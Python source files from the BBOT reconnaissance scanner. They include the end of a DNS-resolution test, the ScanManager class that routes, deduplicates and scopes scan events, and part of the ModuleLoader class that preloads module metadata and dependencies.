    events = []
    async for event in scan4.async_start():
        events.append(event)
    event_data = [e.data for e in events]
    assert "one.one.one.one" in event_data

    # make sure it doesn't work when you turn it off
    no_dns_config = OmegaConf.create({"dns_resolution": False})
    no_dns_config = OmegaConf.merge(bbot_config, no_dns_config)
    scan5 = bbot_scanner("1.1.1.1", config=no_dns_config)
    mock_dns(scan5, dns_table)
    events = []
    async for event in scan5.async_start():
        events.append(event)
    event_data = [e.data for e in events]
    assert "one.one.one.one" not in event_data



import asyncio
import logging
import traceback
from contextlib import suppress

from ..core.errors import ValidationError
from ..core.helpers.async_helpers import TaskCounter, ShuffleQueue

log = logging.getLogger("bbot.scanner.manager")


class ScanManager:
    """
    Manages the modules, event queues, and overall event flow during a scan.

    Simultaneously serves as a policeman, judge, jury, and executioner for events.
    It is responsible for managing the incoming event queue and distributing events to modules.

    Attributes:
        scan (Scan): Reference to the Scan object that instantiated the ScanManager.
        incoming_event_queue (ShuffleQueue): Queue storing incoming events for processing.
        events_distributed (set): Set tracking globally unique events.
        events_accepted (set): Set tracking events accepted by individual modules.
        dns_resolution (bool): Flag to enable or disable DNS resolution.
        _task_counter (TaskCounter): Counter for ongoing tasks.
        _new_activity (bool): Flag indicating new activity.
        _modules_by_priority (dict): Modules sorted by their priorities.
        _incoming_queues (list): List of incoming event queues from each module.
        _module_priority_weights (list): Weight values for each module based on priority.
    """

    def __init__(self, scan):
        """
        Initializes the ScanManager object, setting up essential attributes for scan management.

        Args:
            scan (Scan): Reference to the Scan object that instantiated the ScanManager.
        """

        self.scan = scan

        self.incoming_event_queue = ShuffleQueue()
        # track incoming duplicates module-by-module (for `suppress_dupes` attribute of modules)
        self.incoming_dup_tracker = set()
        # track outgoing duplicates (for `accept_dupes` attribute of modules)
        self.outgoing_dup_tracker = set()
        self.dns_resolution = self.scan.config.get("dns_resolution", False)
        self._task_counter = TaskCounter()
        self._new_activity = True
        self._modules_by_priority = None
        self._incoming_queues = None
        self._module_priority_weights = None

    async def init_events(self):
        """
        Initializes events by seeding the scanner with target events and distributing them for further processing.

        Notes:
            - This method populates the event queue with initial target events.
            - It also marks the Scan object as finished with initialization by setting `_finished_init` to True.
        """

        context = f"manager.init_events()"
        async with self.scan._acatch(context), self._task_counter.count(context):
            await self.distribute_event(self.scan.root_event)
            sorted_events = sorted(self.scan.target.events, key=lambda e: len(e.data))
            for event in sorted_events:
                self.scan.verbose(f"Target: {event}")
                self.queue_event(event)
            await asyncio.sleep(0.1)
            self.scan._finished_init = True

    async def emit_event(self, event, *args, **kwargs):
        """
        TODO: Register + kill duplicate events immediately?
        bbot.scanner: scan._event_thread_pool: running for 0 seconds: ScanManager._emit_event(DNS_NAME("sipfed.online.lync.com"))
        bbot.scanner: scan._event_thread_pool: running for 0 seconds: ScanManager._emit_event(DNS_NAME("sipfed.online.lync.com"))
        bbot.scanner: scan._event_thread_pool: running for 0 seconds: ScanManager._emit_event(DNS_NAME("sipfed.online.lync.com"))
        """
        callbacks = ["abort_if", "on_success_callback"]
        callbacks_requested = any([kwargs.get(k, None) is not None for k in callbacks])
        # "quick" queues the event immediately
        # This is used by speculate
        quick_kwarg = kwargs.pop("quick", False)
        quick_event = getattr(event, "quick_emit", False)
        quick = (quick_kwarg or quick_event) and not callbacks_requested

        # skip event if it fails precheck
        if event.type != "DNS_NAME":
            acceptable = self._event_precheck(event)
            if not acceptable:
                event._resolved.set()
                return

        log.debug(f'Module "{event.module}" raised {event}')

        if quick:
            log.debug(f"Quick-emitting {event}")
            event._resolved.set()
            for kwarg in callbacks:
                kwargs.pop(kwarg, None)
            async with self.scan._acatch(context=self.distribute_event):
                await self.distribute_event(event)
        else:
            async with self.scan._acatch(context=self._emit_event, finally_callback=event._resolved.set):
                await self._emit_event(
                    event,
                    *args,
                    **kwargs,
                )

    def _event_precheck(self, event):
        """
        Check an event to see if we can skip it to save on performance
        """
        if event._dummy:
            log.warning(f"Cannot emit dummy event: {event}")
            return False
        if event == event.get_source():
            log.debug(f"Skipping event with self as source: {event}")
            return False
        if event._graph_important:
            return True
        if self.is_incoming_duplicate(event, add=True):
            log.debug(f"Skipping event because it was already emitted by its module: {event}")
            return False
        return True

    async def _emit_event(self, event, **kwargs):
        """
        Handles the emission, tagging, and distribution of a events during a scan.

        A lot of really important stuff happens here. Actually this is probably the most
        important method in all of BBOT. It is basically the central intersection that
        every event passes through.

        It exists in a delicate balance. Close to half of my debugging time has been spent
        in this function. I have slain many dragons here and there may still be more yet to slay.

        Tread carefully, friend. -TheTechromancer

        Notes:
            - Central function for decision-making in BBOT.
            - Conducts DNS resolution, tagging, and scope calculations.
            - Checks against whitelists and blacklists.
            - Calls custom callbacks.
            - Handles DNS wildcard events.
            - Decides on event acceptance and distribution.

        Parameters:
            event (Event): The event object to be emitted.
            **kwargs: Arbitrary keyword arguments (e.g., `on_success_callback`, `abort_if`).

        Side Effects:
            - Event tagging.
            - Populating DNS data.
            - Emitting new events.
            - Queueing events for further processing.
            - Adjusting event scopes.
            - Running callbacks.
            - Updating scan statistics.
        """
        log.debug(f"Emitting {event}")
        try:
            on_success_callback = kwargs.pop("on_success_callback", None)
            abort_if = kwargs.pop("abort_if", None)

            # skip DNS resolution if it's disabled in the config and the event is a target and we don't have a blacklist
            skip_dns_resolution = (not self.dns_resolution) and "target" in event.tags and not self.scan.blacklist
            if skip_dns_resolution:
                event._resolved.set()
                dns_children = {}
                dns_tags = {"resolved"}
                event_whitelisted_dns = True
                event_blacklisted_dns = False
                resolved_hosts = []
            else:
                # DNS resolution
                (
                    dns_tags,
                    event_whitelisted_dns,
                    event_blacklisted_dns,
                    dns_children,
                ) = await self.scan.helpers.dns.resolve_event(event, minimal=not self.dns_resolution)
                resolved_hosts = set()
                for rdtype, ips in dns_children.items():
                    if rdtype in ("A", "AAAA", "CNAME"):
                        for ip in ips:
                            resolved_hosts.add(ip)

            # kill runaway DNS chains
            dns_resolve_distance = getattr(event, "dns_resolve_distance", 0)
            if dns_resolve_distance >= self.scan.helpers.dns.max_dns_resolve_distance:
                log.debug(
                    f"Skipping DNS children for {event} because their DNS resolve distances would be greater than the configured value for this scan ({self.scan.helpers.dns.max_dns_resolve_distance})"
                )
                dns_children = {}

            if event.type in ("DNS_NAME", "IP_ADDRESS"):
                event._dns_children = dns_children
                for tag in dns_tags:
                    event.add_tag(tag)

            event._resolved_hosts = resolved_hosts

            event_whitelisted = event_whitelisted_dns | self.scan.whitelisted(event)
            event_blacklisted = event_blacklisted_dns | self.scan.blacklisted(event)
            if event_blacklisted:
                event.add_tag("blacklisted")
                reason = "event host"
                if event_blacklisted_dns:
                    reason = "DNS associations"
                log.debug(f"Omitting due to blacklisted {reason}: {event}")
                return

            # other blacklist rejections - URL extensions, etc.
            if "blacklisted" in event.tags:
                log.debug(f"Omitting blacklisted event: {event}")
                return

            # DNS_NAME --> DNS_NAME_UNRESOLVED
            if event.type == "DNS_NAME" and "unresolved" in event.tags and not "target" in event.tags:
                event.type = "DNS_NAME_UNRESOLVED"

            # Cloud tagging
            await self.scan.helpers.cloud.tag_event(event)

            # Scope shepherding
            # here is where we make sure in-scope events are set to their proper scope distance
            if event.host and event_whitelisted:
                log.debug(f"Making {event} in-scope")
                event.scope_distance = 0

            # check for wildcards
            if event.scope_distance <= self.scan.scope_search_distance:
                if not "unresolved" in event.tags:
                    if not self.scan.helpers.is_ip_type(event.host):
                        await self.scan.helpers.dns.handle_wildcard_event(event, dns_children)

            # For DNS_NAMEs, we've waited to do this until now, in case event.data changed during handle_wildcard_event()
            if event.type == "DNS_NAME":
                acceptable = self._event_precheck(event)
                if not acceptable:
                    return

            # now that the event is properly tagged, we can finally make decisions about it
            abort_result = False
            if callable(abort_if):
                async with self.scan._acatch(context=abort_if):
                    abort_result = await self.scan.helpers.execute_sync_or_async(abort_if, event)
                msg = f"{event.module}: not raising event {event} due to custom criteria in abort_if()"
                with suppress(ValueError, TypeError):
                    abort_result, reason = abort_result
                    msg += f": {reason}"
                if abort_result:
                    log.verbose(msg)
                    return

            # run success callback before distributing event (so it can add tags, etc.)
            if callable(on_success_callback):
                async with self.scan._acatch(context=on_success_callback):
                    await self.scan.helpers.execute_sync_or_async(on_success_callback, event)

            await self.distribute_event(event)

            # speculate DNS_NAMES and IP_ADDRESSes from other event types
            source_event = event
            if (
                event.host
                and event.type not in ("DNS_NAME", "DNS_NAME_UNRESOLVED", "IP_ADDRESS", "IP_RANGE")
                and not (event.type in ("OPEN_TCP_PORT", "URL_UNVERIFIED") and str(event.module) == "speculate")
            ):
                source_module = self.scan.helpers._make_dummy_module("host", _type="internal")
                source_module._priority = 4
                source_event = self.scan.make_event(event.host, "DNS_NAME", module=source_module, source=event)
                # only emit the event if it's not already in the parent chain
                if source_event is not None and source_event not in source_event.get_sources():
                    source_event.scope_distance = event.scope_distance
                    if "target" in event.tags:
                        source_event.add_tag("target")
                    self.queue_event(source_event)

            ### Emit DNS children ###
            if self.dns_resolution:
                emit_children = True
                in_dns_scope = -1 < event.scope_distance < self.scan.scope_dns_search_distance
                # only emit DNS children once for each unique host
                host_hash = hash(str(event.host))
                if host_hash in self.outgoing_dup_tracker:
                    emit_children = False
                self.outgoing_dup_tracker.add(host_hash)

                if emit_children:
                    dns_child_events = []
                    if dns_children:
                        for rdtype, records in dns_children.items():
                            module = self.scan.helpers.dns._get_dummy_module(rdtype)
                            module._priority = 4
                            for record in records:
                                try:
                                    child_event = self.scan.make_event(
                                        record, "DNS_NAME", module=module, source=source_event
                                    )
                                    # if it's a hostname and it's only one hop away, mark it as affiliate
                                    if child_event.type == "DNS_NAME" and child_event.scope_distance == 1:
                                        child_event.add_tag("affiliate")
                                    host_hash = hash(str(child_event.host))
                                    if in_dns_scope or self.scan.in_scope(child_event):
                                        dns_child_events.append(child_event)
                                except ValidationError as e:
                                    log.warning(
                                        f'Event validation failed for DNS child of {source_event}: "{record}" ({rdtype}): {e}'
                                    )
                    for child_event in dns_child_events:
                        log.debug(f"Queueing DNS child for {event}: {child_event}")
                        self.queue_event(child_event)

        except ValidationError as e:
            log.warning(f"Event validation failed with kwargs={kwargs}: {e}")
            log.trace(traceback.format_exc())

        finally:
            event._resolved.set()
            log.debug(f"{event.module}.emit_event() finished for {event}")

    def is_incoming_duplicate(self, event, add=False):
        """
        Calculate whether an event is a duplicate in the context of the module that emitted it
        This will return True if the event's parent module has raised the event before.
        """
        try:
            event_hash = event.module._outgoing_dedup_hash(event)
        except AttributeError:
            event_hash = hash((event, str(getattr(event, "module", ""))))
        is_dup = event_hash in self.incoming_dup_tracker
        if add:
            self.incoming_dup_tracker.add(event_hash)
        suppress_dupes = getattr(event.module, "suppress_dupes", True)
        if suppress_dupes and is_dup:
            return True
        return False

    def is_outgoing_duplicate(self, event, add=False):
        """
        Calculate whether an event is a duplicate in the context of the whole scan,
        This will return True if the same event (irregardless of its source module) has been emitted before.

        TODO: Allow modules to use this for custom deduplication such as on a per-host or per-domain basis.
        """
        event_hash = hash(event)
        is_dup = event_hash in self.outgoing_dup_tracker
        if add:
            self.outgoing_dup_tracker.add(event_hash)
        return is_dup

    async def distribute_event(self, event):
        """
        Queue event with modules
        """
        async with self.scan._acatch(context=self.distribute_event):
            # make event internal if it's above our configured report distance
            event_in_report_distance = event.scope_distance <= self.scan.scope_report_distance
            event_will_be_output = event.always_emit or event_in_report_distance
            if not event_will_be_output:
                log.debug(
                    f"Making {event} internal because its scope_distance ({event.scope_distance}) > scope_report_distance ({self.scan.scope_report_distance})"
                )
                event.internal = True

            # if we discovered something interesting from an internal event,
            # make sure we preserve its chain of parents
            source = event.source
            if source.internal and ((not event.internal) or event._graph_important):
                source_in_report_distance = source.scope_distance <= self.scan.scope_report_distance
                if source_in_report_distance:
                    source.internal = False
                if not source._graph_important:
                    source._graph_important = True
                    log.debug(f"Re-queuing internal event {source} with parent {event}")
                    self.queue_event(source)

            is_outgoing_duplicate = self.is_outgoing_duplicate(event)
            if is_outgoing_duplicate:
                self.scan.verbose(f"{event.module}: Duplicate event: {event}")
            # absorb event into the word cloud if it's in scope
            if not is_outgoing_duplicate and -1 < event.scope_distance < 1:
                self.scan.word_cloud.absorb_event(event)
            for mod in self.scan.modules.values():
                acceptable_dup = (not is_outgoing_duplicate) or mod.accept_dupes
                # graph_important = mod._type == "output" and event._graph_important == True
                graph_important = mod._is_graph_important(event)
                if acceptable_dup or graph_important:
                    await mod.queue_event(event)

    async def _worker_loop(self):
        try:
            while not self.scan.stopped:
                try:
                    async with self._task_counter.count("get_event_from_modules()"):
                        event, kwargs = self.get_event_from_modules()
                except asyncio.queues.QueueEmpty:
                    await asyncio.sleep(0.1)
                    continue
                async with self._task_counter.count(f"emit_event({event})"):
                    emit_event_task = asyncio.create_task(
                        self.emit_event(event, **kwargs), name=f"emit_event({event})"
                    )
                    await emit_event_task

        except Exception:
            log.critical(traceback.format_exc())

    def kill_module(self, module_name, message=None):
        from signal import SIGINT

        module = self.scan.modules[module_name]
        module.set_error_state(message=message, clear_outgoing_queue=True)
        for proc in module._proc_tracker:
            with suppress(Exception):
                proc.send_signal(SIGINT)
        self.scan.helpers.cancel_tasks_sync(module._tasks)

    @property
    def modules_by_priority(self):
        if not self._modules_by_priority:
            self._modules_by_priority = sorted(list(self.scan.modules.values()), key=lambda m: m.priority)
        return self._modules_by_priority

    @property
    def incoming_queues(self):
        if not self._incoming_queues:
            queues_by_priority = [m.outgoing_event_queue for m in self.modules_by_priority]
            self._incoming_queues = [self.incoming_event_queue] + queues_by_priority
        return self._incoming_queues

    @property
    def incoming_qsize(self):
        incoming_events = 0
        for q in self.incoming_queues:
            incoming_events += q.qsize()
        return incoming_events

    @property
    def module_priority_weights(self):
        if not self._module_priority_weights:
            # we subtract from six because lower priorities == higher weights
            priorities = [5] + [6 - m.priority for m in self.modules_by_priority]
            self._module_priority_weights = priorities
        return self._module_priority_weights

    def get_event_from_modules(self):
        for q in self.scan.helpers.weighted_shuffle(self.incoming_queues, self.module_priority_weights):
            try:
                return q.get_nowait()
            except (asyncio.queues.QueueEmpty, AttributeError):
                continue
        raise asyncio.queues.QueueEmpty()

    @property
    def queued_event_types(self):
        event_types = {}
        for q in self.incoming_queues:
            for event, _ in q._queue:
                event_type = getattr(event, "type", None)
                if event_type is not None:
                    try:
                        event_types[event_type] += 1
                    except KeyError:
                        event_types[event_type] = 1
        return event_types

    def queue_event(self, event, **kwargs):
        if event:
            # nerf event's priority if it's likely not to be in scope
            if event.scope_distance > 0:
                event_in_scope = self.scan.whitelisted(event) and not self.scan.blacklisted(event)
                if not event_in_scope:
                    event.module_priority += event.scope_distance
            # Wait for parent event to resolve (in case its scope distance changes)
            # await resolved = event.source._resolved.wait()
            # update event's scope distance based on its parent
            event.scope_distance = event.source.scope_distance + 1
            self.incoming_event_queue.put_nowait((event, kwargs))

    @property
    def running(self):
        active_tasks = self._task_counter.value
        incoming_events = self.incoming_qsize
        return active_tasks > 0 or incoming_events > 0

    @property
    def modules_finished(self):
        finished_modules = [m.finished for m in self.scan.modules.values()]
        return all(finished_modules)

    @property
    def active(self):
        return self.running or not self.modules_finished

    def modules_status(self, _log=False):
        finished = True
        status = {"modules": {}}

        for m in self.scan.modules.values():
            mod_status = m.status
            if mod_status["running"]:
                finished = False
            status["modules"][m.name] = mod_status

        for mod in self.scan.modules.values():
            if mod.errored and mod.incoming_event_queue not in [None, False]:
                with suppress(Exception):
                    mod.set_error_state()

        status["finished"] = finished

        modules_errored = [m for m, s in status["modules"].items() if s["errored"]]

        max_mem_percent = 90
        mem_status = self.scan.helpers.memory_status()
        # abort if we don't have the memory
        mem_percent = mem_status.percent
        if mem_percent > max_mem_percent:
            free_memory = mem_status.available
            free_memory_human = self.scan.helpers.bytes_to_human(free_memory)
            self.scan.warning(f"System memory is at {mem_percent:.1f}% ({free_memory_human} remaining)")

        if _log:
            modules_status = []
            for m, s in status["modules"].items():
                running = s["running"]
                incoming = s["events"]["incoming"]
                outgoing = s["events"]["outgoing"]
                tasks = s["tasks"]
                total = sum([incoming, outgoing, tasks])
                if running or total > 0:
                    modules_status.append((m, running, incoming, outgoing, tasks, total))
            modules_status.sort(key=lambda x: x[-1], reverse=True)

            if modules_status:
                modules_status_str = ", ".join([f"{m}({i:,}:{t:,}:{o:,})" for m, r, i, o, t, _ in modules_status])
                self.scan.info(
                    f"{self.scan.name}: Modules running (incoming:processing:outgoing) {modules_status_str}"
                )
            else:
                self.scan.info(f"{self.scan.name}: No modules running")
            event_type_summary = sorted(
                self.scan.stats.events_emitted_by_type.items(), key=lambda x: x[-1], reverse=True
            )
            if event_type_summary:
                self.scan.info(
                    f'{self.scan.name}: Events produced so far: {", ".join([f"{k}: {v}" for k,v in event_type_summary])}'
                )
            else:
                self.scan.info(f"{self.scan.name}: No events produced yet")

            if modules_errored:
                self.scan.verbose(
                    f'{self.scan.name}: Modules errored: {len(modules_errored):,} ({", ".join([m for m in modules_errored])})'
                )

            queued_events_by_type = [(k, v) for k, v in self.queued_event_types.items() if v > 0]
            if queued_events_by_type:
                queued_events_by_type.sort(key=lambda x: x[-1], reverse=True)
                queued_events_by_type_str = ", ".join(f"{m}: {t:,}" for m, t in queued_events_by_type)
                num_queued_events = sum(v for k, v in queued_events_by_type)
                self.scan.info(
                    f"{self.scan.name}: {num_queued_events:,} events in queue ({queued_events_by_type_str})"
                )
            else:
                self.scan.info(f"{self.scan.name}: No events in queue")

            if self.scan.log_level <= logging.DEBUG:
                # status debugging
                scan_active_status = []
                scan_active_status.append(f"scan._finished_init: {self.scan._finished_init}")
                scan_active_status.append(f"manager.active: {self.active}")
                scan_active_status.append(f"    manager.running: {self.running}")
                scan_active_status.append(f"        manager._task_counter.value: {self._task_counter.value}")
                scan_active_status.append(f"        manager._task_counter.tasks:")
                for task in list(self._task_counter.tasks.values()):
                    scan_active_status.append(f"            - {task}:")
                scan_active_status.append(
                    f"        manager.incoming_event_queue.qsize: {self.incoming_event_queue.qsize()}"
                )
                scan_active_status.append(f"    manager.modules_finished: {self.modules_finished}")
                for m in sorted(self.scan.modules.values(), key=lambda m: m.name):
                    running = m.running
                    scan_active_status.append(f"        {m}.finished: {m.finished}")
                    scan_active_status.append(f"            running: {running}")
                    if running:
                        scan_active_status.append(f"            tasks:")
                        for task in list(m._task_counter.tasks.values()):
                            scan_active_status.append(f"                - {task}:")
                    scan_active_status.append(f"            incoming_queue_size: {m.num_incoming_events}")
                    scan_active_status.append(f"            outgoing_queue_size: {m.outgoing_event_queue.qsize()}")
                for line in scan_active_status:
                    self.scan.debug(line)

                # log module memory usage
                module_memory_usage = []
                for module in self.scan.modules.values():
                    memory_usage = module.memory_usage
                    module_memory_usage.append((module.name, memory_usage))
                module_memory_usage.sort(key=lambda x: x[-1], reverse=True)
                self.scan.debug(f"MODULE MEMORY USAGE:")
                for module_name, usage in module_memory_usage:
                    self.scan.debug(f"    - {module_name}: {self.scan.helpers.bytes_to_human(usage)}")

            # Uncomment these lines to enable debugging of event queues

            # queued_events = self.incoming_event_queue.events
            # if queued_events:
            #     queued_events_str = ", ".join(str(e) for e in queued_events)
            #     self.scan.verbose(f"Queued events: {queued_events_str}")
            #     queued_events_by_module = [(k, v) for k, v in self.incoming_event_queue.modules.items() if v > 0]
            #     queued_events_by_module.sort(key=lambda x: x[-1], reverse=True)
            #     queued_events_by_module_str = ", ".join(f"{m}: {t:,}" for m, t in queued_events_by_module)
            #     self.scan.verbose(f"{self.scan.name}: Queued events by module: {queued_events_by_module_str}")

        status.update({"modules_errored": len(modules_errored)})

        return status



import ast
import sys
import importlib
import traceback
from pathlib import Path
from omegaconf import OmegaConf
from contextlib import suppress

from ..flags import flag_descriptions
from .misc import list_files, sha1, search_dict_by_key, search_format_dict, make_table, os_platform


class ModuleLoader:
    """
    Main class responsible for loading BBOT modules.

    This class is in charge of preloading modules to determine their dependencies.
    Once dependencies are identified, they are installed before the actual module is imported.
    This ensures that all requisite libraries and components are available for the module to function correctly.
    """

    def __init__(self):
        self._preloaded = {}
        self._preloaded_orig = None
        self._modules = {}
        self._configs = {}

    def file_filter(self, file):
        file = file.resolve()
        if "templates" in file.parts:
            return False
        return file.suffix.lower() == ".py" and file.stem not in ["base", "__init__"]

    def preload(self, module_dir):
        """Preloads all modules within a directory.

        This function recursively iterates through each file in the specified directory
        and preloads the BBOT module to gather its meta-information and dependencies.

        Args:
            module_dir (str or Path): Directory containing BBOT modules to be preloaded.

        Returns:
            dict: A dictionary where keys are the names of the preloaded modules and
            values are their respective preloaded data.

        Examples:
            >>> preload("/path/to/bbot_modules/")
            {
                "module1": {...},
                "module2": {...},
                ...
            }
        """
        module_dir = Path(module_dir)
        for module_file in list_files(module_dir, filter=self.file_filter):
            if module_dir.name == "modules":
                namespace = f"bbot.modules"
            else:
                namespace = f"bbot.modules.{module_dir.name}"
            try:
                preloaded = self.preload_module(module_file)
                module_type = "scan"
                if module_dir.name in ("output", "internal"):
                    module_type = str(module_dir.name)
                elif module_dir.name not in ("modules"):
                    preloaded["flags"] = list(set(preloaded["flags"] + [module_dir.name]))
                preloaded["type"] = module_type
                preloaded["namespace"] = namespace
                config = OmegaConf.create(preloaded.get("config", {}))
                self._configs[module_file.stem] = config
                self._preloaded[module_file.stem] = preloaded
            except Exception:
                print(f"[CRIT] Error preloading {module_file}\n\n{traceback.format_exc()}")
                print(f"[CRIT] Error in {module_file.name}")
                sys.exit(1)

        return self._preloaded

    def preloaded(self, type=None):
        preloaded = {}
        if type is not None:
            preloaded = {k: v for k, v in self._preloaded.items() if self.check_type(k, type)}
        else:
            preloaded = dict(self._preloaded)
        return preloaded

    def configs(self, type=None):
        configs = {}
        if type is not None:
            configs = {k: v for k, v in self._configs.items() if self.check_type(k, type)}
        else:
            configs = dict(self._configs)
        return OmegaConf.create(configs)

    def find_and_replace(self, **kwargs):
        if self._preloaded_orig is None:
            self._preloaded_orig = dict(self._preloaded)
        self._preloaded = search_format_dict(self._preloaded_orig, **kwargs)

    def check_type(self, module, type):
        return self._preloaded[module]["type"] == type

    def preload_module(self, module_file):
        """
        Preloads a BBOT module to gather its meta-information and dependencies.

        This function reads a BBOT module file, extracts its attributes such as
        events watched and produced, flags, meta-information, and dependencies.

        Args:
            module_file (str): Path to the BBOT module file.

        Returns:
            dict: A dictionary containing meta-information and dependencies for the module.

        Examples:
            >>> preload_module("bbot/modules/wappalyzer.py")
            {
                "watched_events": [
                    "HTTP_RESPONSE"
                ],
                "produced_events": [
                    "TECHNOLOGY"
                ],
                "flags": [
                    "active",
                    "safe",
                    "web-basic",
                    "web-thorough"
                ],
                "meta": {
                    "description": "Extract technologies from web responses"
                },
                "config": {},
                "options_desc": {},
                "hash": "d5a88dd3866c876b81939c920bf4959716e2a374",
                "deps": {
                    "pip": [
                        "python-Wappalyzer~=0.3.1"
                    ],
                    "pip_constraints": [],
                    "shell": [],
                    "apt": [],
                    "ansible": []
                },
                "sudo": false
            }
        """
        watched_events = []
        produced_events = []
        flags = []
        meta = {}
        pip_deps = []
        pip_deps_constraints = []
        shell_deps = []
        apt_deps = []
        ansible_tasks = []
        python_code = open(module_file).read()
        # take a hash of the code so we can keep track of when it changes
        module_hash = sha1(python_code).hexdigest()
        parsed_code = ast.parse(python_code)
        config = {}
        options_desc = {}
        for root_element in parsed_code.body:
            # look for classes
            if type(root_element) == ast.ClassDef:
                for class_attr in root_element.body:
                    # class attributes that are dictionaries
                    if type(class_attr) == ast.Assign and type(class_attr.value) == ast.Dict:
                        # module options
                        if any([target.id == "options" for target in class_attr.targets]):
                            config.update(ast.literal_eval(class_attr.value))
                        # module options
                        if any([target.id == "options_desc" for target in class_attr.targets]):
                            options_desc.update(ast.literal_eval(class_attr.value))
                        # module metadata
                        if any([target.id == "meta" for target in class_attr.targets]):
                            meta = ast.literal_eval(class_attr.value)
                    # class attributes that are lists
                    if type(class_attr) == ast.Assign and type(class_attr.value) == ast.List:
                        # flags
                        if any([target.id == "flags" for target in class_attr.targets]):
                            for flag in class_attr.value.elts:
                                if type(flag.value) == str:
                                    flags.append(flag.value)
                        # watched events
                        if any([target.id == "watched_events" for target in class_attr.targets]):
                            for event_type in class_attr.value.elts:
                                if type(event_type.value) == str:
                                    watched_events.append(event_type.value)
                        # produced events
                        if any([target.id == "produced_events" for target in class_attr.targets]):
                            for event_type in class_attr.value.elts:
                                if type(event_type.value) == str:
                                    produced_events.append(event_type.value)
                        # python dependencies
                        if any([target.id == "deps_pip" for target in class_attr.targets]):
                            for python_dep in class_attr.value.elts:
                                if type(python_dep.value) == str:
                                    pip_deps.append(python_dep.value)

                        if any([target.id == "deps_pip_constraints" for target in class_attr.targets]):
                            for python_dep in class_attr.value.elts:
                                if type(python_dep.value) == str:
                                    pip_deps_constraints.append(python_dep.value)

                        # apt dependencies
                        elif any([target.id == "deps_apt" for target in class_attr.targets]):
                            for apt_dep in class_attr.value.elts:
                                if type(apt_dep.value) == str:
                                    apt_deps.append(apt_dep.value)
                        # bash dependencies
                        elif any([target.id == "deps_shell" for target in class_attr.targets]):
                            for shell_dep in class_attr.value.elts:
                                shell_deps.append(ast.literal_eval(shell_dep))
                        # ansible playbook
                        elif any([target.id == "deps_ansible" for target in class_attr.targets]):
                            ansible_tasks = ast.literal_eval(class_attr.value)
        for task in ansible_tasks:
            if not "become" in task:
                task["become"] = False
            # don't sudo brew
            elif os_platform() == "darwin" and ("package" in task and task.get("become", False) == True):
                task["become"] = False
        preloaded_data = {
            "watched_events": watched_events,
            "produced_events": produced_events,
            "flags": flags,
            "meta": meta,
            "config": config,
            "options_desc": options_desc,
            "hash": module_hash,
            "deps": {
                "pip": pip_deps,
                "pip_constraints": pip_deps_constraints,
                "shell": shell_deps,
                "apt": apt_deps,
                "ansible": ansible_tasks,
            },
            "sudo": len(apt_deps) > 0,
        }
        if any(x == True for x in search_dict_by_key("become", ansible_tasks)) or any(
            x == True for x in search_dict_by_key("ansible_become", ansible_tasks)
        ):
            preloaded_data["sudo"] = True
        return preloaded_data

    def load_modules(self, module_names):
        modules = {}
        for module_name in module_names:
            module = self.load_module(module_name)
            modules[module_name] = module
            self._modules[module_name] = module
        return modules

    def load_module(self, module_name):
        """Loads a BBOT module by its name.

        Imports the module from its namespace, locates its class, and returns it.
        Identifies modules based on the presence of `watched_events` and `produced_events` attributes.

        Args:
            module_name (str): The name of the module to load.

        Returns:
            object: The loaded module class object.

        Examples:
            >>> module = load_module("example_module")
            >>> isinstance(module, object)
            True
        """
        namespace = self._preloaded[module_name]["namespace"]
        import_path = f"{namespace}.{module_name}"
        module_variables = importlib.import_module(import_path, "bbot")

        # for every top-level variable in the .py file
        for variable in module_variables.__dict__.keys():
            # get its value
            value = getattr(module_variables, variable)
            with suppress(AttributeError):
                # if it has watched_events and produced_events
                if all(
                    type(a) == list
                    for a in (getattr(value, "watched_events", None), getattr(value, "produced_events", None))
                ):
                    # and if its variable name matches its filename
                    if value.__name__.lower() == module_name.lower():
                        value._name = module_name
                        # then we have a module
                        return value

    def recommend_dependencies(self, modules):
        """
        Returns a dictionary containing missing dependencies and their suggested resolutions

        Needs work. For this we should probably be building a dependency graph
        """
        resolve_choices = {}
        # step 1: build a dictionary containing event types and their associated modules
        # {"IP_ADDRESS": set("nmap", "ipneighbor", ...)}
        watched = {}
        produced = {}
        for modname in modules:
            preloaded = self._preloaded.get(modname)
            if preloaded:
                for event_type in preloaded.get("watched_events", []):
                    self.add_or_create(watched, event_type, modname)
                for event_type in preloaded.get("produced_events", []):
                    self.add_or_create(produced, event_type, modname)
        watched_all = {}
        produced_all = {}
        for modname, preloaded in self.preloaded().items():
            if preloaded:
                for event_type in preloaded.get("watched_events", []):
                    self.add_or_create(watched_all, event_type, modname)
                for event_type in preloaded.get("produced_events", []):
                    self.add_or_create(produced_all, event_type, modname)

        # step 2: check to see if there are missing dependencies
        for modname in modules:
            preloaded = self._preloaded.get(modname)
            module_type = preloaded.get("type", "unknown")
            if module_type != "scan":
                continue
            watched_events = preloaded.get("watched_events", [])
            missing_deps = {e: not self.check_dependency(e, modname, produced) for e in watched_events}
            if all(missing_deps.values()):
                for event_type in watched_events:
                    if event_type == "SCAN":
                        continue
                    choices = produced_all.get(event_type, [])
                    choices = set(choices)
                    with suppress(KeyError):
                        choices.remove(modname)
                    if event_type not in resolve_choices:
                        resolve_choices[event_type] = dict()
                    deps = resolve_choices[event_type]
                    self.add_or_create(deps, "required_by", modname)
                    for c in choices:
                        choice_type = self._preloaded.get(c, {}).get("type", "unknown")
                        if choice_type == "scan":
                            self.add_or_create(deps, "recommended", c)

        return resolve_choices

    def check_dependency(self, event_type, modname, produced):
        if event_type not in produced:
            return False
        if produced[event_type] == {modname}:
            return False
        return True

    @staticmethod
    def add_or_create(d, k, *items):
        try:
            d[k].update(set(items))
        except KeyError:
            d[k] = set(items)

    def modules_table(self, modules=None, mod_type=None):
        """Generates a table of module information.

        Constructs a table to display information such as module name, type, and event details.

        Args:
            modules (list, optional): List of module names to include in the table.
            mod_type (str, optional): Type of modules to include ('scan', 'output', 'internal').

        Returns:
            str: A formatted table string.

        Examples:
            >>> print(modules_table(["nmap"]))
            +----------+--------+-----------------+------------------------------+-------------------------------+----------------------+-------------------+
            | Module   | Type   | Needs API Key   | Description                  | Flags                         | Consumed Events      | Produced Events   |
            +==========+========+=================+==============================+===============================+======================+===================+
            | nmap     | scan   | No              | Execute port scans with nmap | active, aggressive, portscan, | DNS_NAME, IP_ADDRESS | OPEN_TCP_PORT     |
            |          |        |                 |                              | web-thorough                  |                      |                   |
            +----------+--------+-----------------+------------------------------+-------------------------------+----------------------+-------------------+
        """

        table = []
        header = ["Module", "Type", "Needs API Key", "Description", "Flags", "Consumed Events", "Produced Events"]
        maxcolwidths = [20, 10, 5, 30, 30, 20, 20]
